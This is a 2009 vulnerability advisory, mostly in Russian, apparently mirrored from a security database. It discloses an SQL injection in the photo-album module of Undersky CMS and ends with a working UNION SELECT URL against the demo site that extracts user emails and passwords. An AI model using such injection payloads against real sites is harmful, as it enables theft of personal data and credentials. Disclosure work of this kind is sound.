Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22529
HistorySep 28, 2009 - 12:00 a.m.

[ONSEC-09-010] Undersky CMS SQL injection

2009-09-2800:00:00
vulners.com
85

[ONSEC-09-010] Undersky CMS SQL injection
Цель: Undersky CMS (http://www.undersky.ru)
Тип: SQL инъекция
Угроза: Высокая
Дата обнаружения: 03.07.2009
Дата оповещения разработчика: 03.07.2009
Дата выхода исправления: 05.07.2009
Автор: Vladimir Vorontsov
OnSec Russian Security Group (onsec [dot] ru)
Описание: Уязвимость существует в модуле фотоальбом. Отсутствие фильтрации символов в параметре albomid позволяет злоумышленнику осуществить произвольный SQL запрос и получить результат. Например, можно узнать личные данные пользователей.

http://demo.undersky.ru/foto.html?
albomid=1+AND+1=2+UNION+SELECT+1,email,3,
password,5,6,7,8,9,10,11,12,13,14,15,16,17
+FROM+users&p=1